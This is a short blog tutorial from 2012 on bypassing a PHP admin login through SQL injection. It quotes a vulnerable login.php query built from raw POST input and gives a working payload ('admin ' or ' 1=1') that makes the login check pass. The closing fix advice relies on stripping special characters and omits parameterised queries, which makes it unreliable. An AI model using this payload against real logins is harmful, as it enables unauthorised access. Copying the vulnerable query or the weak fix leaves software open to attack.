Pages

Thursday, August 30, 2012

How to bypass Admin/user login through SQL Injection

- Code snippet from /admin/login.php
 ——————————————————————————————————————————
 $postbruger = $_POST['username'];
$postpass = md5($_POST['password']);
$resultat = mysql_query(“SELECT * FROM ” . $tablestart . “login WHERE brugernavn = ‘$postbruger’ AND password = ‘$postpass’”)
or die(”
” . mysql_error() . “\n”);
——————————————————————————————————————————
The variables isn’t properly checked.We can bypass this login.Lets inject the following username and password :
username : admin ‘ or ‘ 1=1
password : sirgod
We logged in.Why?Look,the code will become
———————————————————————————————————————————
$resultat = mysql_query(“SELECT * FROM ” . $tablestart . “login WHERE brugernavn = ‘admin’ ‘ or ‘ 1=1 AND password = ‘sirgod’”)
———————————————————————————————————————————
Login bypassed.The username must be an existent username.
How to fix?
Simple way : Don’t allow special chars in variables.For numeric variables
use (int) ,example $id=(int)$_GET['id'];
Another way : For non-numeric variables : filter all special chars used in
SQLI : – , . ( ) ‘ ” _ + / * 

1 comment: